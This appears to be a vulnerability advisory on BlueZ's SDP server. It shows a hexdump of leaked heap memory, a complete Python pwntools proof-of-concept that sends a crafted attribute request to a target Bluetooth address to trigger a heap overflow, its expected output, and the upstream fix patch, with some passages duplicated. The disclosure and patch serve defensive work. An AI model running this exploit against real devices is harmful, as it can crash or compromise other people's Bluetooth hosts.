34 66 62 3b │00-0│0805│f9b3│4fb;│ 000001b0 30 30 30 30 31 31 33 32 2d 30 30 30 30 2d 31 30 │0000│1132│-000│0-10│ 000001c0 30 30 2d 38 30 30 30 2d 30 30 38 30 35 66 39 62 │00-8│000-│0080│5f9b│ 000001d0 33 34 66 62 3b 30 30 30 30 31 32 30 30 2d 30 30 │34fb│;000│0120│0-00│ 000001e0 30 30 2d 31 30 30 30 2d 38 30 30 30 2d 30 30 38 │00-1│000-│8000│-008│ 000001f0 30 35 66 39 62 33 34 66 62 3b 30 30 30 30 31 38 │05f9│b34f│b;00│0018│ 00000200 30 30 2d 30 30 30 30 2d 31 30 30 30 2d 38 30 30 │00-0│000-│1000│-800│ 00000210 30 2d 30 30 38 30 35 66 39 62 33 34 66 62 3b 30 │0-00│805f│9b34│fb;0│ 00000220 30 30 30 31 38 30 31 2d 30 30 30 30 2d 31 30 30 │0001│801-│0000│-100│ 00000230 30 2d 38 30 30 30 2d 30 30 38 30 35 66 39 62 33 │0-80│00-0│0805│f9b3│ 00000240 34 66 62 3b 30 30 30 30 36 36 37 35 2d 37 34 37 │4fb;│0000│6675│-747│ 00000250 35 2d 37 32 36 35 2d 36 34 36 39 2d 36 31 36 63 │5-72│65-6│469-│616c│ 00000260 36 32 37 35 36 64 37 30 3b 0a 0a 5b 44 65 76 69 │6275│6d70│;··[│Devi│ 00000270 63 65 49 44 5d 0a 53 6f 75 72 63 65 3d 31 0a 56 │ceID│]·So│urce│=1·V│ 00000280 65 6e 64 6f 72 3d 31 35 0a 50 72 6f 64 75 63 74 │endo│r=15│·Pro│duct│ 00000290 3d 34 36 30 38 0a 56 65 72 73 69 6f 6e 3d 35 31 │=460│8·Ve│rsio│n=51│ 000002a0 37 34 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 │74··│····│····│····│ 000002b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ * 000003d0 00 00 00 00 00 00 41 00 00 00 00 00 00 00 35 00 │····│··A·│····│··5·│ 000003e0 04 00 00 00 00 00 80 4d 40 27 aa 55 00 00 00 00 │····│···M│@'·U│····│ 000003f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000400 00 00 00 00 00 00 12 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000410 00 00 00 00 00 00 41 00 00 00 00 00 00 00 09 00 │····│··A·│····│····│ 00000420 11 03 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000430 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000440 00 00 00 00 00 00 03 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000450 00 00 00 00 00 00 31 00 00 00 00 00 00 00 01 00 │····│··1·│····│····│ 00000460 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000470 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 │····│····│····│··0·│ 00000480 00 00 00 00 00 00 31 00 00 00 00 00 00 00 f0 b5 │····│··1·│····│····│ 00000490 41 27 aa 55 00 00 8c 45 a5 5a 00 00 00 00 30 b9 │A'·U│···E│·Z··│··0·│ 000004a0 41 27 aa 55 00 00 66 00 00 00 66 00 00 00 33 34 │A'·U│··f·│··f·│··34│ 000004b0 66 62 00 00 00 00 11 04 00 00 00 00 00 00 20 17 │fb··│····│····│·· ·│ 000004c0 41 27 aa 55 00 00 45 20 6e 6f 64 65 20 50 55 42 │A'·U│··E │node│ PUB│ 000004d0 4c 49 43 20 22 2d 2f 2f 66 72 65 65 64 65 73 6b │LIC │"-//│free│desk│ 000004e0 74 6f 70 2f 2f 44 54 44 20 44 2d 42 55 53 20 4f │top/│/DTD│ D-B│US O│ 000004f0 62 6a 65 63 74 20 49 6e 74 72 6f 73 70 65 63 74 │bjec│t In│tros│pect│ 00000500 69 6f 6e 20 31 2e 30 2f 2f 45 4e 22 0a 22 68 74 │ion │1.0/│/EN"│·"ht│ 00000510 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 64 65 73 │tp:/│/www│.fre│edes│ 00000520 6b 74 6f 70 2e 6f 72 67 2f 73 74 61 6e 64 61 72 │ktop│.org│/sta│ndar│ 00000530 64 73 2f 64 62 75 73 2f 31 2e 30 2f 69 6e 74 72 │ds/d│bus/│1.0/│intr│ 00000540 6f 73 70 65 63 74 2e 64 74 64 22 3e 0a 3c 6e 6f │ospe│ct.d│td">│·<no│ 00000550 64 65 3e 3c 69 6e 74 65 72 66 61 63 65 20 6e 61 │de><│inte│rfac│e na│ 00000560 6d 65 3d 22 6f 72 67 2e 66 72 65 65 64 65 73 6b │me="│org.│free│desk│ 00000570 74 6f 70 2e 44 42 75 73 2e 49 6e 74 72 6f 73 70 │top.│DBus│.Int│rosp│ 00000580 65 63 74 61 62 6c 65 22 3e 3c 6d 65 74 68 6f 64 │ecta│ble"│><me│thod│ 00000590 20 6e 61 6d 65 3d 22 49 6e 74 72 6f 73 70 65 63 │ nam│e="I│ntro│spec│ 000005a0 74 22 3e 3c 61 72 67 20 6e 61 6d 65 3d 22 78 6d │t"><│arg │name│="xm│ 000005b0 6c 22 20 74 79 70 65 3d 22 73 22 20 64 69 72 65 │l" t│ype=│"s" │dire│ 000005c0 63 74 69 6f 6e 3d 22 6f 75 74 22 2f 3e 0a 3c 2f │ctio│n="o│ut"/│>·</│ 000005d0 6d 65 74 68 6f 64 3e 3c 2f 69 6e 74 65 72 66 61 │meth│od><│/int│erfa│ 000005e0 63 65 3e 3c 69 6e 74 65 72 66 61 63 65 20 6e 61 │ce><│inte│rfac│e na│ 000005f0 6d 65 3d 22 6f 72 67 2e 66 72 65 65 64 65 73 6b │me="│org.│free│desk│ 00000600 74 6f 70 2e 44 42 75 73 2e 4f 62 6a 65 63 74 4d │top.│DBus│.Obj│ectM│ 00000610 61 6e 61 67 65 72 22 3e 3c 6d 65 74 68 6f 64 20 │anag│er">│<met│hod │ 00000620 6e 61 6d 65 3d 22 47 65 74 4d 61 6e 61 67 65 64 │name│="Ge│tMan│aged│ 00000630 4f 62 6a 65 63 74 73 22 3e 3c 61 72 67 20 6e 61 │Obje│cts"│><ar│g na│ 00000640 6d 65 3d 22 6f 62 6a 65 63 74 73 22 20 74 79 70 │me="│obje│cts"│ typ│ 00000650 65 3d 22 61 7b 6f 61 7b 73 61 7b 73 76 7d 7d 7d │e="a│{oa{│sa{s│v}}}│ 00000660 22 20 64 69 72 65 63 74 69 6f 6e 3d 22 6f 75 74 │" di│rect│ion=│"out│ 00000670 22 2f 3e 0a 3c 2f 6d 65 74 68 6f 64 3e 3c 73 69 │"/>·│</me│thod│><si│ 00000680 67 6e 61 6c 20 6e 61 6d 65 3d 22 49 6e 74 65 72 │gnal│ nam│e="I│nter│ 00000690 66 61 63 65 73 41 64 64 65 64 22 3e 3c 61 72 67 │face│sAdd│ed">│<arg│ 000006a0 20 6e 61 6d 65 3d 22 6f 62 6a 65 63 74 22 20 74 │ nam│e="o│bjec│t" t│ 000006b0 79 70 65 3d 22 6f 22 2f 3e 0a 3c 61 72 67 20 6e │ype=│"o"/│>·<a│rg n│ 000006c0 61 6d 65 3d 22 69 6e 74 65 72 66 61 63 65 73 22 │ame=│"int│erfa│ces"│ 000006d0 20 74 79 70 65 3d 22 61 7b 73 61 7b 73 76 7d 7d │ typ│e="a│{sa{│sv}}│ 000006e0 22 2f 3e 0a 3c 2f 73 69 67 6e 61 6c 3e 0a 3c 73 │"/>·│</si│gnal│>·<s│ 000006f0 69 67 6e 61 6c 20 6e 61 6d 65 3d 22 49 6e 74 65 │igna│l na│me="│Inte│ 00000700 72 66 61 63 65 73 52 65 6d 6f 76 65 64 22 3e 3c │rfac│esRe│move│d"><│ 00000710 61 72 67 20 6e 61 6d 65 3d 22 6f 62 6a 65 63 74 │arg │name│="ob│ject│ 00000720 22 20 74 79 70 65 3d 22 6f 22 2f 3e 0a 3c 61 72 │" ty│pe="│o"/>│·<ar│ 00000730 67 20 6e 61 6d 65 3d 22 69 6e 74 65 72 66 61 63 │g na│me="│inte│rfac│ 00000740 65 73 22 20 74 79 70 65 3d 22 61 73 22 2f 3e 0a │es" │type│="as│"/>·│ 00000750 3c 2f 73 69 67 6e 61 6c 3e 0a 3c 2f 69 6e 74 65 │</si│gnal│>·</│inte│ 00000760 72 66 61 63 65 3e 3c 6e 6f 64 65 20 6e 61 6d 65 │rfac│e><n│ode │name│ 00000770 3d 22 6f 72 67 22 2f 3e 3c 2f 6e 6f 64 65 3e 00 │="or│g"/>│</no│de>·│ 00000780 30 30 2d 30 30 30 30 2d 31 30 30 30 2d 38 30 30 │00-0│000-│1000│-800│ 00000790 30 2d 30 30 38 30 35 66 39 62 33 34 66 62 00 00 │0-00│805f│9b34│fb··│ 000007a0 00 00 24 00 00 00 30 30 30 30 31 38 30 30 2d 30 │··$·│··00│0018│00-0│ 000007b0 30 30 30 2d 31 30 30 30 2d 38 30 30 30 2d 30 30 │000-│1000│-800│0-00│ 000007c0 38 30 35 66 39 62 33 34 66 62 00 00 00 00 24 00 │805f│9b34│fb··│··$·│ 000007d0 00 00 30 30 30 30 31 38 30 31 2d 30 30 30 30 2d │··00│0018│01-0│000-│ 000007e0 31 30 30 30 2d 38 30 30 30 2d 30 30 38 30 35 66 │1000│-800│0-00│805f│ 000007f0 39 62 33 34 66 62 00 00 00 00 24 00 00 00 30 30 │9b34│fb··│··$·│··00│ 00000800 30 30 36 36 37 35 2d 37 34 37 35 2d 37 32 36 35 │0066│75-7│475-│7265│ 00000810 2d 36 34 36 39 2d 36 31 36 63 36 32 37 35 36 64 │-646│9-61│6c62│756d│ 00000820 37 30 00 00 00 00 08 00 00 00 4d 6f 64 61 6c 69 │70··│····│··Mo│dali│ 00000830 61 73 00 01 73 00 19 00 00 00 62 6c 75 65 74 6f │as··│s···│··bl│ueto│ 00000840 6f 74 68 3a 76 30 30 30 46 70 31 32 30 30 64 31 │oth:│v000│Fp12│00d1│ 00000850 34 33 36 00 00 00 07 00 00 00 41 64 61 70 74 65 │436·│····│··Ad│apte│ 00000860 72 00 01 6f 00 00 0f 00 00 00 2f 6f 72 67 2f 62 │r··o│····│··/o│rg/b│ 00000870 6c 75 65 7a 2f 68 63 69 30 00 00 00 00 00 10 00 │luez│/hci│0···│····│ 00000880 00 00 53 65 72 76 69 63 65 73 52 65 73 6f 6c 76 │··Se│rvic│esRe│solv│ 00000890 65 64 00 01 62 00 00 00 00 00 00 00 00 00 1f 00 │ed··│b···│····│····│ 000008a0 00 00 6f 72 67 2e 66 72 65 65 64 65 73 6b 74 6f │··or│g.fr│eede│skto│ 000008b0 70 2e 44 42 75 73 2e 50 72 6f 70 65 72 74 69 65 │p.DB│us.P│rope│rtie│ 000008c0 73 00 00 00 00 00 11 02 00 00 00 00 00 00 a0 29 │s···│····│····│···)│ 000008d0 41 27 aa 55 00 00 74 77 6f 72 6b 31 00 00 18 00 │A'·U│··tw│ork1│····│ 000008e0 00 00 00 00 00 00 09 00 00 00 43 6f 6e 6e 65 63 │····│····│··Co│nnec│ 000008f0 74 65 64 00 01 62 00 00 00 00 00 00 00 00 17 00 │ted·│·b··│····│····│ 00000900 00 00 6f 72 67 2e 62 6c 75 65 7a 2e 4d 65 64 69 │··or│g.bl│uez.│Medi│ 00000910 61 43 6f 6e 74 72 6f 6c 31 00 18 00 00 00 09 00 │aCon│trol│1···│····│ 00000920 00 00 43 6f 6e 6e 65 63 74 65 64 00 01 62 00 00 │··Co│nnec│ted·│·b··│ 00000930 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ * 00000ac0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 │····│····│····│····│ 00000ad0 00 00 00 00 00 00 11 02 00 00 00 00 00 00 b0 2b │····│····│····│···+│ 00000ae0 41 27 aa 55 00 00 00 00 00 00 00 00 00 00 01 00 │A'·U│····│····│····│ 00000af0 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000b00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000b10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000b20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 │····│····│····│····│ 00000b30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ * 00000b60 00 00 00 00 00 00 11 00 00 00 00 00 00 00 12 00 │····│····│····│····│ 00000b70 00 00 00 00 00 00 13 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000b80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ * 00000bb0 00 00 00 00 00 00 1b 00 00 00 00 00 00 00 1c 00 │····│····│····│····│ 00000bc0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000bd0 00 00 00 00 00 00 1f 00 00 00 00 00 00 00 20 00 │····│····│····│·· ·│ 00000be0 00 00 00 00 00 00 21 00 00 00 00 00 00 00 00 00 │····│··!·│····│····│ 00000bf0 00 00 00 00 00 00 23 00 00 00 00 00 00 00 24 00 │····│··#·│····│··$·│ 00000c00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ * 00000c80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 00 │····│····│····│··6·│ 00000c90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ * 00000ce0 00 00 00 00 00 00 11 02 00 00 00 00 00 00 20 ca │····│····│····│·· ·│ 00000cf0 40 27 aa 55 00 00 00 00 00 00 00 00 00 00 60 d5 │@'·U│····│····│··`·│ 00000d00 3f 27 aa 55 00 00 80 3f 40 27 aa 55 00 00 00 00 │?'·U│···?│@'·U│····│ 00000d10 00 00 00 00 00 00 e0 48 40 27 aa 55 00 00 00 00 │····│···H│@'·U│····│ 00000d20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000d30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 54 │····│····│····│···T│ 00000d40 40 27 aa 55 00 00 00 00 00 00 00 00 00 00 00 00 │@'·U│····│····│····│ 00000d50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ * 00000d70 00 00 00 00 00 00 d0 82 40 27 aa 55 00 00 80 8b │····│····│@'·U│····│ 00000d80 40 27 aa 55 00 00 a0 8c 40 27 aa 55 00 00 00 00 │@'·U│····│@'·U│····│ 00000d90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ * 00000dc0 00 00 00 00 00 00 70 a8 40 27 aa 55 00 00 50 a9 │····│··p·│@'·U│··P·│ 00000dd0 40 27 aa 55 00 00 00 00 00 00 00 00 00 00 00 00 │@'·U│····│····│····│ 00000de0 00 00 00 00 00 00 10 c6 40 27 aa 55 00 00 c0 c6 │····│····│@'·U│····│ 00000df0 40 27 aa 55 00 00 20 c8 40 27 aa 55 00 00 00 00 │@'·U│·· ·│@'·U│····│ 00000e00 00 00 00 00 00 00 60 d3 40 27 aa 55 00 00 d0 d4 │····│··`·│@'·U│····│ 00000e10 40 27 aa 55 00 00 00 00 00 00 00 00 00 00 00 00 │@'·U│····│····│····│ 00000e20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ * 00000e90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 a2 │····│····│····│····│ 00000ea0 41 27 aa 55 00 00 00 00 00 00 00 00 00 00 00 00 │A'·U│····│····│····│ 00000eb0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ * 00000ef0 00 00 00 00 00 00 51 00 00 00 00 00 00 00 80 e5 │····│··Q·│····│····│ 00000f00 3f 27 aa 55 00 00 2f 62 6c 75 65 74 6f 6f 74 68 │?'·U│··/b│luet│ooth│ 00000f10 2f 37 30 3a 46 33 3a 39 35 3a 37 41 3a 42 39 3a │/70:│F3:9│5:7A│:B9:│ 00000f20 43 38 2f 63 61 63 68 65 2f 30 30 3a 31 41 3a 37 │C8/c│ache│/00:│1A:7│ 00000f30 44 3a 44 41 3a 37 31 3a 31 31 2e 57 46 53 49 46 │D:DA│:71:│11.W│FSIF│ 00000f40 5a 00 00 00 00 00 21 00 00 00 00 00 00 00 01 00 │Z···│··!·│····│····│ 00000f50 00 00 17 00 00 00 18 00 00 00 19 00 00 00 30 75 │····│····│····│··0u│ 00000f60 00 00 00 00 00 00 51 00 00 00 00 00 00 00 40 e1 │····│··Q·│····│··@·│ 00000f70 41 27 aa 55 00 00 70 81 40 27 aa 55 00 00 20 00 │A'·U│··p·│@'·U│·· ·│ 00000f80 00 00 00 00 00 00 30 00 00 00 00 00 00 00 70 81 │····│··0·│····│··p·│ 00000f90 40 27 aa 55 00 00 73 76 7d 61 73 00 00 00 20 00 │@'·U│··sv│}as·│·· ·│ 00000fa0 00 00 00 00 00 00 f0 c4 40 27 aa 55 00 00 50 00 │····│····│@'·U│··P·│ 00000fb0 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000fc0 00 00 00 00 00 00 00 12 41 27 aa 55 00 00 18 00 │····│····│A'·U│····│ 00000fd0 00 00 20 00 00 00 00 00 00 00 00 00 00 00 ff ff │·· ·│····│····│····│ 00000fe0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff │····│····│····│····│ * 00001000 ff ff ff ff ff ff 08 56 4c a5 5a c8 10 00 00 │····│···V│L·Z·│···│ 0000100f Heap overflow poc: from pwn import * import bluetooth if not 'TARGET' in args: log.info("Usage: sdp_heapoverflow_poc.py TARGET=XX:XX:XX:XX:XX:XX") exit() # the service from which we want to request attributes (GAP) SERVICE_REC_HANDLE = 0x00010001 target = args['TARGET'] mtu = 65535 attrcount = 1000 # how often to request the attribute context.endian = 'big' def sdppacket(handle, attr): pkt = "" pkt += p32(handle) # handle pkt += p16(0xFFFF) # max_rsp_size # contains an attribute sequence with the length describing the attributes being 16 bit long # see extract_des function in line 113 of src/sdpd-request.c pkt += p8(0x36) # DTD (seq_type SDP_SEQ16) pkt += p16(len(attr)) # seq size, 16 bit according to DTD # attributes pkt += attr pkt += p8(0x00) # Cstate len pduhdr = "" pduhdr += p8(0x04) # pdu_id 0x04 -> SVC_ATTR_REQ pduhdr += p16(0x0000) # tid pduhdr += p16(len(pkt)) # plen return pduhdr + pkt if __name__ == '__main__': log.info('Creating L2CAP socket') sock = bluetooth.BluetoothSocket(bluetooth.L2CAP) bluetooth.set_l2cap_mtu(sock, mtu) log.info('Connecting to target') sock.connect((target, 1)) # the attribute we want to request (multiple times) # to create the largest response possible, we request a # range of attributes at once. # for more control during exploitation, it would also be possible to request # single attributes. attr = p8(0x0A) # data type (SDP_UINT_32) attr += p16(0x0000) # attribute id start attr += p16(0xFFFE) # attribute id end sdp = sdppacket(SERVICE_REC_HANDLE, attr*attrcount) log.info("packet length: %d bytes" % len(sdp)) log.info('Triggering heap overflow...') sock.send(sdp) 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 from pwn import * import bluetooth if not 'TARGET' in args: log.info("Usage: sdp_heapoverflow_poc.py TARGET=XX:XX:XX:XX:XX:XX") exit() # the service from which we want to request attributes (GAP) SERVICE_REC_HANDLE = 0x00010001 target = args['TARGET'] mtu = 65535 attrcount = 1000 # how often to request the attribute context.endian = 'big' def sdppacket(handle, attr): pkt = "" pkt += p32(handle) # handle pkt += p16(0xFFFF) # max_rsp_size # contains an attribute sequence with the length describing the attributes being 16 bit long # see extract_des function in line 113 of src/sdpd-request.c pkt += p8(0x36) # DTD (seq_type SDP_SEQ16) pkt += p16(len(attr)) # seq size, 16 bit according to DTD # attributes pkt += attr pkt += p8(0x00) # Cstate len pduhdr = "" pduhdr += p8(0x04) # pdu_id 0x04 -> SVC_ATTR_REQ pduhdr += p16(0x0000) # tid pduhdr += p16(len(pkt)) # plen return pduhdr + pkt if __name__ == '__main__': log.info('Creating L2CAP socket') sock = bluetooth.BluetoothSocket(bluetooth.L2CAP) bluetooth.set_l2cap_mtu(sock, mtu) log.info('Connecting to target') sock.connect((target, 1)) # the attribute we want to request (multiple times) # to create the largest response possible, we request a # range of attributes at once. # for more control during exploitation, it would also be possible to request # single attributes. attr = p8(0x0A) # data type (SDP_UINT_32) attr += p16(0x0000) # attribute id start attr += p16(0xFFFE) # attribute id end sdp = sdppacket(SERVICE_REC_HANDLE, attr*attrcount) log.info("packet length: %d bytes" % len(sdp)) log.info('Triggering heap overflow...') sock.send(sdp) If everything happens as expected, we shall get a similar output to this: [*] Creating L2CAP socket [*] Connecting to target [*] packet length: 5015 bytes [*] Triggering heap overflow... 1 2 3 4 [*] Creating L2CAP socket [*] Connecting to target [*] packet length: 5015 bytes [*] Triggering heap overflow... Patches suggested by Luiz Augusto von Dentz SDP Info leak patch: From 00d8409234302e5e372af9b4cc299b55faecb0a4 Mon Sep 17 00:00:00 2001 From: Luiz Augusto von Dentz <luiz.von.dentz@intel.com> Date: Fri, 28 Sep 2018 15:04:42 +0300 Subject: [PATCH BlueZ 1/2] sdp: Fix not checking if cstate length MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit cstate length should be smaller than cached length otherwise the request shall be considered invalid as the data is not within the cached buffer. An independent security researcher, Julian Rauchberger, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program. --- src/sdpd-request.c | 74 ++++++++++++++++++++++++---------------------- 1 file changed, 39 insertions(+), 35 deletions(-) diff --git a/src/sdpd-request.c b/src/sdpd-request.c index 318d04467..deaed266f 100644 --- a/src/sdpd-request.c +++ b/src/sdpd-request.c @@ -70,9 +70,16 @@ static sdp_buf_t *sdp_get_cached_rsp(sdp_cont_state_t *cstate) { sdp_cstate_list_t *p; - for (p = cstates; p; p = p->next) - if (p->timestamp == cstate->timestamp) + for (p = cstates; p; p = p->next) { + /* Check timestamp */ + if (p->timestamp != cstate->timestamp) + continue; + + /* Check if requesting more than available */ + if (cstate->cStateValue.maxBytesSent < p->buf.data_size) return &p->buf; + } + return 0; } @@ -624,6 +631,31 @@ static int extract_attrs(sdp_record_t *rec, sdp_list_t *seq, sdp_buf_t *buf) return 0; } +/* Build cstate response */ +static int sdp_cstate_rsp(sdp_cont_state_t *cstate, sdp_buf_t *buf, + uint16_t max) +{ + /* continuation State exists -> get from cache */ + sdp_buf_t *cache = sdp_get_cached_rsp(cstate); + uint16_t sent; + + if (!cache) + return 0; + + sent = MIN(max, cache->data_size - cstate->cStateValue.maxBytesSent); + memcpy(buf->data, cache->data + cstate->cStateValue.maxBytesSent, sent); + buf->data_size += sent; + cstate->cStateValue.maxBytesSent += sent; + + SDPDBG("Response size : %d sending now : %d bytes sent so far : %d", + cache->data_size, sent, cstate->cStateValue.maxBytesSent); + + if (cstate->cStateValue.maxBytesSent == cache->data_size) + return sdp_set_cstate_pdu(buf, NULL); + + return sdp_set_cstate_pdu(buf, cstate); +} + /* * A request for the attributes of a service record. * First check if the service record (specified by @@ -633,7 +665,6 @@ static int extract_attrs(sdp_record_t *rec, sdp_list_t *seq, sdp_buf_t *buf) static int service_attr_req(sdp_req_t *req, sdp_buf_t *buf) { sdp_cont_state_t *cstate = NULL; - uint8_t *pResponse = NULL; short cstate_size = 0; sdp_list_t *seq = NULL; uint8_t dtd = 0; @@ -719,24 +750,8 @@ static int service_attr_req(sdp_req_t *req, sdp_buf_t *buf) buf->buf_size -= sizeof(uint16_t); if (cstate) { - sdp_buf_t *pCache = sdp_get_cached_rsp(cstate); - - SDPDBG("Obtained cached rsp : %p", pCache); - - if (pCache) { - short sent = MIN(max_rsp_size, pCache->data_size - cstate->cStateValue.maxBytesSent); - pResponse = pCache->data; - memcpy(buf->data, pResponse + cstate->cStateValue.maxBytesSent, sent); - buf->data_size += sent; - cstate->cStateValue.maxBytesSent += sent; - - SDPDBG("Response size : %d sending now : %d bytes sent so far : %d", - pCache->data_size, sent, cstate->cStateValue.maxBytesSent); - if (cstate->cStateValue.maxBytesSent == pCache->data_size) - cstate_size = sdp_set_cstate_pdu(buf, NULL); - else - cstate_size = sdp_set_cstate_pdu(buf, cstate); - } else { + cstate_size = sdp_cstate_rsp(cstate, buf, max_rsp_size); + if (!cstate_size) { status = SDP_INVALID_CSTATE; error("NULL cache buffer and non-NULL continuation state"); } @@ -786,7 +801,7 @@ done: static int service_search_attr_req(sdp_req_t *req, sdp_buf_t *buf) { int status = 0, plen, totscanned; - uint8_t *pdata, *pResponse = NULL; + uint8_t *pdata; unsigned int max; int scanned, rsp_count = 0; sdp_list_t *pattern = NULL, *seq = NULL, *svcList; @@ -915,19 +930,8 @@ static int service_search_attr_req(sdp_req_t *req, sdp_buf_t *buf) } else cstate_size = sdp_set_cstate_pdu(buf, NULL); } else { - /* continuation State exists -> get from cache */ - sdp_buf_t *pCache = sdp_get_cached_rsp(cstate); - if (pCache && cstate->cStateValue.maxBytesSent < pCache->data_size) { - uint16_t sent = MIN(max, pCache->data_size - cstate->cStateValue.maxBytesSent); - pResponse = pCache->data; - memcpy(buf->data, pResponse + cstate->cStateValue.maxBytesSent, sent); - buf->data_size += sent; - cstate->cStateValue.maxBytesSent += sent; - if (cstate->cStateValue.maxBytesSent == pCache->data_size) - cstate_size = sdp_set_cstate_pdu(buf, NULL); - else - cstate_size = sdp_set_cstate_pdu(buf, cstate); - } else { + cstate_size = sdp_cstate_rsp(cstate, buf, max); + if (!cstate_size) { status = SDP_INVALID_CSTATE; SDPDBG("Non-null continuation state, but null cache buffer"); } -- 2.17.1 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 From 00d8409234302e5e372af9b4cc299b55faecb0a4 Mon Sep 17 00:00:00 2001 From: Luiz Augusto von Dentz <luiz.von.dentz@intel.com> Date: Fri, 28 Sep 2018 15:04:42 +0300 Subject: [PATCH BlueZ 1/2] sdp: Fix not checking if cstate length MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit cstate length should be smaller than cached length otherwise the request shall be considered invalid as the data is not within the cached buffer. An independent security researcher, Julian Rauchberger, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program. --- src/sdpd-request.c | 74 ++++++++++++++++++++++++---------------------- 1 file changed, 39 insertions(+), 35 deletions(-) diff --git a/src/sdpd-request.c b/src/sdpd-request.c index 318d04467..deaed266f 100644 --- a/src/sdpd-request.c +++ b/src/sdpd-request.c @@ -70,9 +70,16 @@ static sdp_buf_t *sdp_get_cached_rsp(sdp_cont_state_t *cstate) { sdp_cstate_list_t *p; - for (p = cstates; p; p = p->next) - if (p->timestamp == cstate->timestamp) + for (p = cstates; p; p = p->next) { + /* Check timestamp */ + if (p->timestamp != cstate->timestamp) + continue; + + /* Check if requesting more than available */ + if (cstate->cStateValue.maxBytesSent < p->buf.data_size) return &p->buf; + } + return 0; } @@ -624,6 +631,31 @@ static int extract_attrs(sdp_record_t *rec, sdp_list_t *seq, sdp_buf_t *buf) return 0; } +/* Build cstate response */ +static int sdp_cstate_rsp(sdp_cont_state_t *cstate, sdp_buf_t *buf, + uint16_t max) +{ + /* continuation State exists -> get from cache */ + sdp_buf_t *cache = sdp_get_cached_rsp(cstate); + uint16_t sent; + + if (!cache) + return 0; + + sent = MIN(max, cache->data_size - cstate->cStateValue.maxBytesSent); + memcpy(buf->data, cache->data + cstate->cStateValue.maxBytesSent, sent); + buf->data_size += sent; + cstate->cStateValue.maxBytesSent += sent; + + SDPDBG("Response size : %d sending now : %d bytes sent so far : %d", + cache->data_size, sent, cstate->cStateValue.maxBytesSent); + + if (cstate->cStateValue.maxBytesSent == cache->data_size) + return sdp_set_cstate_pdu(buf, NULL); + + return sdp_set_cstate_pdu(buf, cstate); +} + /* * A request for the attributes of a service record. * First check if the service record (specified by @@ -633,7 +665,6 @@ static int extract_attrs(sdp_record_t *rec, sdp_list_t *seq, sdp_buf_t *buf) static int service_attr_req(sdp_req_t *req, sdp_buf_t *buf) { sdp_cont_state_t *cstate = NULL; - uint8_t *pResponse = NULL; short cstate_size = 0; sdp_list_t *seq = NULL; uint8_t dtd = 0; @@ -719,24 +750,8 @@ static int service_attr_req(sdp_req_t *req, sdp_buf_t *buf) buf->buf_size -= sizeof(uint16_t); if (cstate) { - sdp_buf_t *pCache = sdp_get_cached_rsp(cstate); - - SDPDBG("Obtained cached rsp : %p", pCache); - - if (pCache) { - short sent = MIN(max_rsp_size, pCache->data_size - cstate->cStateValue.maxBytesSent); - pResponse = pCache->data; - memcpy(buf->data, pResponse + cstate->cStateValue.maxBytesSent, sent); - buf->data_size += sent; - cstate->cStateValue.maxBytesSent += sent; - - SDPDBG("Response size : %d sending now : %d bytes sent so far : %d", - pCache->data_size, sent, cstate->cStateValue.maxBytesSent); - if (cstate->cStateValue.maxBytesSent == pCache->data_size) - cstate_size = sdp_set_cstate_pdu(buf, NULL); - else - cstate_size = sdp_set_cstate_pdu(buf, cstate); - } else { + cstate_size = sdp_cstate_rsp(cstate, 